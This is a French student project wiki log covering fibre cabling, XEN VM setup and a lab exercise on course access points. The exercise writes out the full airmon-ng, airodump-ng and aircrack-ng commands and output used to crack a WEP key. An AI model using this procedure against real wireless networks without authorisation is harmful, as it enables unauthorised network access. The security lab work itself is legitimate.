Cahier 2016 groupe n°2

De Wiki d'activités IMA
Révision datée du 7 novembre 2016 à 08:21 par Jjoignau (discussion | contributions) (Cahier des charges)

Tâche particulière

Câblage de la fibre:
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants. Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement.

  • Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique.
  • Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total.
  • 2 Grands câbles de 30m ~ -> Estimation de 26m entre les 2 piles.
  • 2 petits câbles de 15m ~ -> Estimation de 13m du boîtier à la pile
  • Retirer le câble ethernet qui était tiré entre les 2 piles.
  • 7 heures passées au total sur la tâche particulière
Fibre passant entre les 2 salles
Câbles dans le faux plafond
Guide câbles pour le faux plafond
Boîtiers contenant les raccords de fibres
Les fibres en E304 disponibles
Trou dans le cache laissant passer la fibre









































































Travail commun

  • Installation de la machine virtuelle XEN
  • Achat du nom de domaine [1] sur Gandi pour 1.19€ TTC


Crackage de la clef WEP

Nous avons fait le crack de la clé WEP sur cracotte08. Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.

root@zebrasoma:/home/pifou# airmon-ng


Interface	Chipset		Driver

mon0		Ralink RT2870/3070	rt2800usb - [phy1]
wlan0		Broadcom	wl - [phy0]
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]

On entre ensuite en mode monitoring sur l'interface wlan5 :

root@zebrasoma:/home/pifou# airmon-ng start wlan5


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
1986	avahi-daemon
1987	avahi-daemon


Interface	Chipset		Driver

mon0		Ralink RT2870/3070	rt2800usb - [phy1]
wlan0		Broadcom	wl - [phy0]
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]
				(monitor mode enabled on mon1)

Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.

root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5

 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         
                                                                                                       
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                       
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   
                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              
                                                                                                        
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     

Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)

root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5

 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         
                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                       
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               
                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             
                                                                                                                                   
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     

Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :

root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap
                           Aircrack-ng 1.2 beta3


                 [00:00:04] Tested 112801 keys (got 3050 IVs)

   KB    depth   byte(vote)
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) 
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) 
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) 
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) 
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) 

Failed. Next try with 5000 IVs.

Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.

Au final, nous arrivons bien à récupérer la clef WEP :


                               Aircrack-ng 1.2 beta3


                 [00:04:10] Tested 799 keys (got 42913 IVs)

   KB    depth   byte(vote)
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) 
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) 
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) 
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) 
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) 

             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] 
	Decrypted correctly: 100%